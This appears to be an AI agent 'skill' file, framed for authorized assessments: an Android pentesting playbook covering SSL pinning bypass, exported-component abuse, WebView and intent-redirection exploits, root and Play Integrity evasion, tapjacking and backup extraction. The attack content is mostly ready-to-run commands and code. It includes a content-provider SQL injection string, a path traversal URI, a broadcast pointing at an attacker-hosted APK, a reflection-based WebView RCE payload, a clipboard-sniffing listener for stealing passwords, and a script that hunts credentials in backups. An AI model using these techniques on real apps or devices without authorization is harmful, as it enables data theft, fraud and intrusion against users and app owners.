---
name: android-pentesting-tricks
description: >-
  Android pentesting playbook. Use when testing Android applications for SSL pinning bypass,
  exported component abuse, WebView vulnerabilities, intent redirection, root detection bypass,
  tapjacking, and backup extraction during authorized mobile security assessments.
---

# SKILL: Android Pentesting Tricks — Expert Attack Playbook

> **AI LOAD INSTRUCTION**: Expert Android application security testing techniques. Covers SSL pinning bypass (Frida/Objection/LSPosed), component exposure, WebView exploitation, intent redirection, root detection bypass, and Play Integrity evasion. Base models miss Frida hook specifics and multi-layer bypass chains.

## 0. RELATED ROUTING

Before going deep, consider loading:

- [mobile-ssl-pinning-bypass](../mobile-ssl-pinning-bypass/SKILL.md) for in-depth cross-platform SSL pinning bypass techniques and framework-specific hooks
- [ios-pentesting-tricks](../ios-pentesting-tricks/SKILL.md) when also testing the iOS version of the same app
- [api-sec](../api-sec/SKILL.md) for backend API security testing once traffic is intercepted

### Advanced Reference

Also load [FRIDA_SCRIPTS.md](./FRIDA_SCRIPTS.md) when you need:

- Ready-to-use Frida script templates for common Android testing tasks
- Detailed hook points for OkHttp, Retrofit, Volley, WebView
- Root detection bypass script collection

---
## 1. SSL PINNING BYPASS

### 1.1 Frida Universal Bypass

```bash
# Install Frida server on device (the server version must match your frida-tools version)
adb push frida-server-16.x.x-android-arm64 /data/local/tmp/
adb shell "chmod 755 /data/local/tmp/frida-server-16.x.x-android-arm64"
adb shell "/data/local/tmp/frida-server-16.x.x-android-arm64 &"

# Universal SSL pinning bypass: spawn the app with the script already loaded so
# hooks are in place before the first TLS handshake. Frida 16 resumes a spawned
# process by default (the old --no-pause flag was removed; use --pause to hold it).
frida -U -l ssl_pinning_bypass.js -f com.target.app
```

| Hook Point | Library/Class | Coverage |
|---|---|---|
| `X509TrustManager.checkServerTrusted` | Android SDK | All standard HTTPS |
| `OkHttpClient.Builder.sslSocketFactory` | OkHttp 3.x/4.x | Square OkHttp |
| `CertificatePinner.check` | OkHttp 3.x/4.x | OkHttp pinning |
| `HttpsURLConnection.setSSLSocketFactory` | Android SDK | Legacy HTTPS |
| `SSLContext.init` | Android SDK | Custom SSL contexts |
| `WebViewClient.onReceivedSslError` | WebView | WebView SSL errors |
| `TrustManagerFactory.getTrustManagers` | Android SDK | Factory-created TMs |

Hooking `checkServerTrusted` alone is not enough when the app pins inside OkHttp's `CertificatePinner` or validates in native code (e.g. a bundled BoringSSL/curl); if traffic still fails after the Java hooks are in place, look for JNI libraries in `lib/` and pin checks there.

### 1.2 Objection (Quick Method)

```bash
objection -g com.target.app explore
# Inside Objection REPL:
android sslpinning disable
```

### 1.3 Network Security Config (Debug Builds)

If you can modify the APK or it's a debug build, point `android:networkSecurityConfig` in `<application>` at a config whose `<debug-overrides>` trusts user-installed CAs. `<debug-overrides>` only takes effect while `android:debuggable="true"`; for a repackaged release build put the `user` trust anchor in `<base-config>` instead, and delete any `<pin-set>` the original config declared, since pins in the config are enforced just like code-level pinning. The standard form of the override, restored here from the empty block in the source:

```xml
<?xml version="1.0" encoding="utf-8"?>
<network-security-config>
    <debug-overrides>
        <trust-anchors>
            <certificates src="system" />
            <certificates src="user" />
        </trust-anchors>
    </debug-overrides>
</network-security-config>
```

### 1.4 Magisk Module Approach

| Module | Method | Scope |
|---|---|---|
| LSPosed + TrustMeAlready | Hooks system-wide TrustManager | All apps |
| LSPosed + SSLUnpinning | Targeted SSL bypass | Per-app |
| MagiskTrustUserCerts | Mounts user-installed CAs over the system CA store | All apps trusting system CAs (Android 7 to 13) |
| ConscryptTrustUserCerts | Same trick for the Conscrypt APEX, where the system CA store lives from Android 14 | Android 14+ |

Since Android 7, apps ignore user-installed CAs unless their Network Security Config opts in, which is why the two certificate-moving modules exist; they do nothing against an app that pins, so combine them with one of the hook-based approaches above when needed.

---
## 2. COMPONENT EXPOSURE

### 2.1 Exported Activities

```bash
# Find exported activities (AndroidManifest.xml or aapt). A component that declares an
# <intent-filter> but no android:exported attribute is exported by default when the app
# targets API < 31, so grepping only for exported=true under-counts the attack surface.
aapt dump xmltree target.apk AndroidManifest.xml | grep -B 5 "exported.*true"

# Launch exported activity directly
adb shell am start -n com.target.app/.AdminActivity
adb shell am start -n com.target.app/.DeepLinkActivity \
  -d "target://callback?token=attacker_token"

# With extra data
adb shell am start -n com.target.app/.TransferActivity \
  --es "amount" "99999" --es "recipient" "attacker"
```

### 2.2 Content Providers

```bash
# Query exposed content providers
adb shell content query --uri content://com.target.app.provider/users

# SQL injection in content provider: the selection argument is concatenated into the
# provider's query, so a parenthesis closes the original WHERE and a UNION is appended
adb shell content query --uri "content://com.target.app.provider/users" \
  --where "1=1) UNION SELECT sql,2,3 FROM sqlite_master--"

# Path traversal in a file-providing content provider whose openFile() joins the
# URI path onto a base directory without canonicalising it
adb shell content read --uri "content://com.target.app.fileprovider/../../../../etc/hosts"
```

| Provider Type | Attack Vector | Impact |
|---|---|---|
| Database-backed | SQL injection via `query()` projection/selection | Data leak, auth bypass |
| File-backed | Path traversal via URI | Read arbitrary files |
| Parcelable | Type confusion in custom Parcelable | Code execution |

### 2.3 Broadcast Receivers

```bash
# Send crafted broadcast
adb shell am broadcast -a com.target.app.ACTION_UPDATE \
  --es "url" "http://attacker.com/malicious.apk"

# Ordered broadcast interception: a receiver registered with a higher android:priority
# on its intent-filter runs first and can read, rewrite (setResultData) or abort the
# broadcast before the target receiver ever sees it.
```

Check for an `android:permission` on the receiver or a `Context.sendBroadcast(intent, permission)` on the sender: a protected broadcast cannot be spoofed from `am broadcast` or an unprivileged app.

### 2.4 Exported Services

```bash
# Start/bind to exported service
adb shell am startservice -n com.target.app/.BackgroundService \
  --es "command" "exfiltrate"

# List running services
adb shell dumpsys activity services | grep com.target
```

---
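The grep above only catches explicit `exported="true"`; the platform's default rules (implicit export through an `<intent-filter>`, providers exported by default before targetSdk 17, the attribute becoming mandatory at targetSdk 31) decide the rest. The script below is an added example, not part of the original playbook, that applies those rules to a decoded manifest such as `apktool d` produces and prints an `adb shell am start` line for each exported activity. The manifest it embeds is constructed for the example, and `com.target.app` with its component names are placeholders.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver", "provider")

# Constructed sample manifest (placeholder package and component names, not a real app).
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.target.app">
  <uses-sdk android:targetSdkVersion="30"/>
  <application android:allowBackup="true">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".DeepLinkActivity">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data android:scheme="target" android:host="callback"/>
      </intent-filter>
    </activity>
    <activity android:name=".AdminActivity" android:exported="true"/>
    <activity android:name=".InternalAdminActivity" android:exported="false"/>
    <provider android:name=".UserProvider" android:authorities="com.target.app.provider"/>
    <receiver android:name=".UpdateReceiver" android:permission="com.target.app.UPDATE">
      <intent-filter><action android:name="com.target.app.ACTION_UPDATE"/></intent-filter>
    </receiver>
  </application>
</manifest>
"""


def attr(el, name, default=None):
    """Read an android:-namespaced attribute from a manifest element."""
    return el.get("{%s}%s" % (ANDROID_NS, name), default)


def is_exported(comp, target_sdk):
    """Apply the platform's default-export rules; returns (exported, reason)."""
    explicit = attr(comp, "exported")
    if explicit is not None:
        return explicit == "true", "explicit android:exported=%s" % explicit
    if comp.tag == "provider":
        # Providers were exported by default until targetSdk 17, intent-filter or not.
        return target_sdk < 17, "provider default (targetSdk %d)" % target_sdk
    if comp.find("intent-filter") is not None:
        # Implicit export. From targetSdk 31 the attribute is mandatory and the
        # install is rejected without it, so this case means targetSdk < 31.
        return True, "implicitly exported by <intent-filter>"
    return False, "no <intent-filter>, no android:exported"


def find_exported(manifest_xml, target_sdk=None):
    """Return the exported components with the reason and the URI schemes they accept."""
    root = ET.fromstring(manifest_xml)
    pkg = root.get("package")
    if target_sdk is None:
        sdk = root.find("uses-sdk")
        target_sdk = int(attr(sdk, "targetSdkVersion", "1")) if sdk is not None else 1
    found = []
    for comp in root.iter():
        if comp.tag not in COMPONENT_TAGS:
            continue
        exported, reason = is_exported(comp, target_sdk)
        if not exported:
            continue
        name = attr(comp, "name")
        if name.startswith("."):
            name = pkg + name
        found.append({
            "kind": comp.tag,
            "name": name,
            "reason": reason,
            "permission": attr(comp, "permission"),  # caller-side permission gate, if any
            "schemes": [attr(d, "scheme") for d in comp.iter("data") if attr(d, "scheme")],
        })
    return found


def launch_command(pkg, comp):
    """Build the adb command that drives an exported activity directly."""
    cmd = "adb shell am start -n %s/%s" % (pkg, comp["name"])
    if comp["schemes"]:
        cmd += ' -d "%s://attacker"' % comp["schemes"][0]
    return cmd


if __name__ == "__main__":
    for c in find_exported(SAMPLE_MANIFEST):
        print("%-10s %-45s %s" % (c["kind"], c["name"], c["reason"]))
        if c["kind"] == "activity":
            print("    ", launch_command("com.target.app", c))
```

Run it against the manifest from `apktool d target.apk` by reading that file into `find_exported`; apktool keeps the real `targetSdkVersion` in `apktool.yml` rather than in the manifest, so pass it explicitly via `target_sdk=` when the `<uses-sdk>` element is missing. The `permission` field matters for triage: an exported receiver behind a signature-level permission is not reachable from `am broadcast`.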
## 3. WEBVIEW VULNERABILITIES

### 3.1 JavaScript Interface RCE (Pre-API 17)

```java
// Vulnerable code: an object exposed to page JavaScript. With targetSdkVersion < 17 every
// public method of the object (inherited ones included) is callable from JS; the
// @JavascriptInterface annotation that restricts this is only enforced from API 17.
webView.addJavascriptInterface(new JSInterface(), "android");
```

```javascript
// Inject into the WebView (pre-API 17): walk from the exposed object to java.lang.Runtime
// through reflection and run a shell command as the app's UID.
android.getClass().forName('java.lang.Runtime')
       .getMethod('getRuntime').invoke(null).exec('id');
```

On API 17+ with the annotation in place, the bridge is still worth testing: every annotated method is callable by any page the WebView loads, so the question becomes whether attacker-controlled content can reach the WebView (next two subsections).

### 3.2 Modern WebView Attacks

| Vulnerability | Condition | Exploit |
|---|---|---|
| `setJavaScriptEnabled(true)` + untrusted content | JS enabled + attacker controls loaded URL | XSS → bridge access |
| `setAllowFileAccessFromFileURLs(true)` | file:// can read other file:// | Load `file:///data/data/com.target/...` |
| `setAllowUniversalAccessFromFileURLs(true)` | file:// can access any origin | Exfiltrate via XHR to attacker |
| `loadUrl(user_controlled)` | User input in loadUrl | javascript: scheme or file:// |
| `shouldOverrideUrlLoading` bypass | Incomplete URL validation | Redirect to attacker-controlled page |
| `evaluateJavascript` with tainted data | User data in JS execution | XSS in WebView context |

Both file-URL settings default to `true` for targetSdkVersion 15 and below and to `false` from 16, so on old targets they are effectively on even when the code never calls them.

### 3.3 Deep Link to WebView Chain

```
1. Attacker crafts deep link: target://webview?url=https://attacker.com/xss.html
2. App opens WebView with attacker URL
3. XSS in WebView calls JavaScript bridge: android.sensitiveMethod()
4. Bridge executes in app context with app's permissions
```

---

## 4. INTENT REDIRECTION

Exported activity receives an Intent and starts another (internal) activity using data from the received Intent.
```java
// Vulnerable pattern: the exported activity forwards whatever Intent it was handed
Intent received = getIntent();
Intent redirect = (Intent) received.getParcelableExtra("next_intent");
startActivity(redirect);
// Attacker controls "next_intent" → can start any non-exported activity of the app; the
// forwarded Intent is sent with the app's own identity, including any
// FLAG_GRANT_*_URI_PERMISSION flags it carries.
```

`am start` has no option for a nested Intent extra (`--es` stores a String, so `getParcelableExtra` returns null), so exploiting the Parcelable form needs a small PoC app that calls `putExtra("next_intent", nestedIntent)`. The one-liner below works only when the target reads a string and parses it with `Intent.parseUri()`:

```bash
# Exploit (URI-string variant): start non-exported internal activity via redirection
adb shell am start -n com.target.app/.ExportedActivity \
  --es "next_intent" "intent:#Intent;component=com.target.app/.InternalAdminActivity;end"
```

| Pattern | Indicator | Risk |
|---|---|---|
| `getParcelableExtra` → `startActivity` | Intent-in-Intent | Start non-exported activities |
| `getStringExtra("url")` → `startActivity(Intent.ACTION_VIEW)` | URL forwarding | Open arbitrary URLs |
| `getStringExtra("class")` → `Class.forName` → `startActivity` | Dynamic class loading | Start any activity by name |

---

## 5. ROOT DETECTION BYPASS

### 5.1 Common Root Detection Checks

| Check | What It Detects | Frida Bypass |
|---|---|---|
| `su` binary exists | `/system/xbin/su`, `/sbin/su` | Hook `File.exists()` (and `Runtime.exec` for `which su`) → return false |
| Build tags contain "test-keys" | `Build.TAGS` | Set the static field `Build.TAGS` → "release-keys" |
| Magisk Manager installed | Package name check | Hook `PackageManager.getPackageInfo` → throw `NameNotFoundException` for the Magisk package |
| Superuser.apk present | Su management app | Hook `File.exists()` |
| RootBeer library | Multi-check root detection | Hook all RootBeer check methods |
| SafetyNet/Play Integrity | Server-side attestation | Requires Magisk DenyList + module |
| Abnormal system properties | `ro.debuggable=1`, etc. | Hook `SystemProperties.get` |

Checks implemented in native code (JNI `stat()` on `/sbin/su`, reading `/proc/self/mounts`) do not go through the Java APIs above and need `Interceptor.attach` on the libc symbols instead.

### 5.2 Magisk DenyList (Previously MagiskHide)

```bash
# Magisk app → Settings → enable Zygisk → Configure DenyList → tick the target app.
# For that process DenyList unmounts Magisk's files and mount points and reverts its
# property changes, which covers the su binary, mount-point and prop checks above.
# Hide the Magisk app separately (Settings → "Hide the Magisk app"): DenyList does not
# rename the manager package that a PackageManager check looks for.
```

---
## 6. PLAY INTEGRITY / SAFETYNET BYPASS

| Level | What It Checks | Bypass Difficulty |
|---|---|---|
| Basic Integrity | Not rooted, not emulator | Easy (Magisk + DenyList) |
| Device Integrity | Bootloader locked, verified boot | Moderate with a fingerprint-spoofing module; hard otherwise (wants a locked bootloader) |
| Strong Integrity | Hardware-backed key attestation of the boot state | Very hard (the attestation chain is rooted in the TEE and cannot be spoofed from software) |

Techniques:

- Magisk with Zygisk enabled + DenyList for target app
- Play Integrity Fix (PIF) Magisk module: spoofs the device fingerprint to a build that is verified on the software attestation path
- Shamiko module: hides root from specific apps
- Custom ROM re-locked with its own AVB key (Pixel-specific): satisfies checks that only look at the lock flag, but key attestation still reports a self-signed boot key, so it does not help against Strong Integrity

Play Integrity verdicts are fetched by the app's backend, not the app, so intercepting and editing the client-side response only works when the app (wrongly) evaluates the token locally.

---

## 7. TAPJACKING (OVERLAY ATTACKS)

A tapjacking PoC draws a window that covers the victim's sensitive control and lets touches pass through; the app-side protection is the per-view `filterTouchesWhenObscured` attribute, which makes the view drop touches delivered while another window covers it. The XML block in the source was empty; the two fragments a tester checks for are:

```xml
<!-- Attacker app manifest: required to draw over other apps (user-granted via Settings since 6.0) -->
<uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />

<!-- Target app layout: the defensive attribute; a sensitive control without it is the finding -->
<Button
    android:id="@+id/confirm_transfer"
    android:layout_width="wrap_content"
    android:layout_height="wrap_content"
    android:filterTouchesWhenObscured="true"
    android:text="Confirm" />
```

| Android Version | Protection | Bypass |
|---|---|---|
| Pre-6.0 | `filterTouchesWhenObscured` exists (API 9+) but is opt-in; `SYSTEM_ALERT_WINDOW` granted at install | Full overlay |
| 6.0–11 | `SYSTEM_ALERT_WINDOW` must be granted by the user in Settings; `filterTouchesWhenObscured` still opt-in | Apps not using it are vulnerable once the permission is granted |
| 12+ | Touches passing through an overlay from another app are blocked unless the overlay is below the maximum obscuring opacity (0.8) | Partial overlays, timing-based |

---

## 8. BACKUP EXTRACTION

```bash
# Check if backup allowed
aapt dump xmltree target.apk AndroidManifest.xml | grep allowBackup
# android:allowBackup(0x01010280)=(type 0x12)0xffffffff → true (and true is the default when the attribute is absent)
# Caveat: from Android 12, adb backup excludes app data for apps targeting API 31+ unless the app is debuggable.

# Extract backup (confirm the prompt on the device; leave the password empty)
adb backup -f backup.ab -apk com.target.app

# Convert to tar. The header is 24 bytes: "ANDROID BACKUP\n<version>\n1\nnone\n"
# (magic, format version, compressed flag, encryption); the rest is a zlib stream.
# `openssl zlib` only exists in zlib-enabled OpenSSL builds, and a password-protected
# backup (fourth line "AES-256") must be decrypted before this step.
dd if=backup.ab bs=24 skip=1 | openssl zlib -d > backup.tar
tar xf backup.tar

# Analyze extracted data
find com.target.app -name "*.db" -o -name "*.xml" -o -name "*.json"
# Check shared_prefs/ for tokens, credentials
# Check databases/ for SQLite DBs with sensitive data
```

---
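The `dd bs=24 skip=1 | openssl zlib -d` one-liner assumes a fixed-size header, an OpenSSL build with zlib support, and an unencrypted backup, and it silently produces garbage when any of those does not hold. The Python below is an added example, not part of the original playbook, that reads the header fields explicitly, refuses encrypted files, inflates the payload, and flags tar members whose contents look like credential material. The `.ab` it builds in memory is constructed for the example (the package name and the shared_prefs content are made up); in practice read `backup.ab` from disk and pass the bytes to `parse_backup`.

```python
import io
import re
import tarfile
import zlib

MAGIC = b"ANDROID BACKUP\n"


def build_sample_backup():
    """Construct an in-memory .ab laid out the way `adb backup -f backup.ab com.target.app`
    writes one. The shared_prefs file inside is made up for this example."""
    prefs = (b'<?xml version="1.0" encoding="utf-8"?>\n<map>\n'
             b'  <string name="auth_token">eyJhbGciOiJIUzI1NiJ9.example</string>\n'
             b'  <boolean name="onboarded" value="true" />\n</map>\n')
    tar_buf = io.BytesIO()
    with tarfile.open(fileobj=tar_buf, mode="w") as tar:
        info = tarfile.TarInfo("apps/com.target.app/sp/session.xml")
        info.size = len(prefs)
        tar.addfile(info, io.BytesIO(prefs))
    # Header lines: magic, format version, compressed flag, encryption algorithm.
    header = MAGIC + b"5\n" + b"1\n" + b"none\n"
    return header + zlib.compress(tar_buf.getvalue())


def parse_backup(ab):
    """Split an .ab blob into its header fields and the tar payload."""
    if not ab.startswith(MAGIC):
        raise ValueError("not an Android backup file")
    # The magic already ends in a newline, so four splits isolate the four header lines
    # and leave the binary payload untouched in the last element.
    parts = ab.split(b"\n", 4)
    version = int(parts[1])
    compressed = parts[2] == b"1"
    encryption = parts[3].decode()
    payload = parts[4]
    if encryption != "none":
        # Password-protected backups carry extra key-derivation header lines and an
        # AES-encrypted payload; a plain inflate of the remaining bytes is meaningless.
        raise ValueError("backup is encrypted with %s; decrypt it with the backup password first"
                         % encryption)
    tar_bytes = zlib.decompress(payload) if compressed else payload
    return {"version": version, "compressed": compressed,
            "encryption": encryption, "tar": tar_bytes}


SECRET_RE = re.compile(rb"(token|passw|secret|api[_-]?key|credential)", re.I)


def find_secrets(tar_bytes):
    """List backed-up files whose contents match common credential names."""
    hits = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        for member in tar.getmembers():
            if member.isfile() and SECRET_RE.search(tar.extractfile(member).read()):
                hits.append(member.name)
    return hits


if __name__ == "__main__":
    ab = build_sample_backup()
    info = parse_backup(ab)
    print("version=%d compressed=%s encryption=%s tar=%d bytes"
          % (info["version"], info["compressed"], info["encryption"], len(info["tar"])))
    for name in find_secrets(info["tar"]):
        print("possible credential material in", name)
```

The tar member layout (`apps/<package>/sp/` for shared_prefs, `apps/<package>/db/` for databases, `apps/<package>/a/` for the APK when `-apk` was given) is what `tar xf backup.tar` unpacks; `find_secrets` is a first pass over it, not a substitute for opening the SQLite files.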
## 9. ADDITIONAL TRICKS

### 9.1 Debuggable App Exploitation

```bash
# If android:debuggable="true" in manifest
adb shell run-as com.target.app
# Now running as the app's own UID (not root) with full access to its data directory
cat /data/data/com.target.app/shared_prefs/*.xml
```

### 9.2 Drozer (Component Testing Framework)

```bash
# List attack surface
dz> run app.package.attacksurface com.target.app
# Exported Activities: 3
# Exported Services: 1
# Exported Providers: 2

# Query provider
dz> run app.provider.query content://com.target.app.provider/users

# Scan for injection
dz> run scanner.provider.injection -a com.target.app
```

### 9.3 Clipboard Sniffing

```java
import android.content.ClipData;
import android.content.ClipboardManager;

// Pre-Android 10: any app can read the clipboard at any time. From Android 10,
// getPrimaryClip() only returns data to the foreground app or the default IME.
// (Runs inside a Context, e.g. a Service.)
ClipboardManager cm = (ClipboardManager) getSystemService(CLIPBOARD_SERVICE);
cm.addPrimaryClipChangedListener(() -> {
    ClipData data = cm.getPrimaryClip();
    // Exfiltrate copied passwords, tokens, etc.
});
```

---

## 10. ANDROID PENTESTING DECISION TREE

```
Testing Android application
│
├── Can intercept HTTPS traffic?
│   ├── No → SSL pinning in place
│   │   ├── Frida available? → universal SSL bypass script (§1.1)
│   │   ├── Rooted + Magisk? → LSPosed + TrustMeAlready (§1.4)
│   │   ├── Debug build? → Network Security Config (§1.3)
│   │   └── None above? → manual decompile + patch + repackage
│   └── Yes → proceed to traffic analysis
│
├── Exported components found?
│   ├── Exported Activities → test direct launch, deeplink abuse (§2.1)
│   ├── Content Providers → SQLi, path traversal (§2.2)
│   ├── Broadcast Receivers → crafted intent injection (§2.3)
│   └── Services → unauthorized service binding (§2.4)
│
├── WebView present?
│   ├── JavaScript enabled + JS interface? → bridge exploitation (§3.1)
│   ├── File access enabled? → file:// scheme abuse (§3.2)
│   └── Deep link → WebView? → URL injection chain (§3.3)
│
├── Intent handling found?
│   └── Intent-in-Intent pattern? → redirect to internal activity (§4)
│
├── Root detection blocking testing?
│   ├── Client-side checks only? → Frida hook bypass (§5.1)
│   ├── SafetyNet/Play Integrity? → Magisk DenyList + modules (§6)
│   └── Custom obfuscated checks? → reverse engineer + targeted hooks
│
├── Sensitive data storage?
│   ├── allowBackup=true? → ADB backup extraction (§8)
│   ├── Debuggable? → run-as for direct data access (§9.1)
│   └── SharedPreferences → check for plaintext tokens/credentials
│
└── UI-based attacks applicable?
    └── Overlay possible? → tapjacking (§7)
```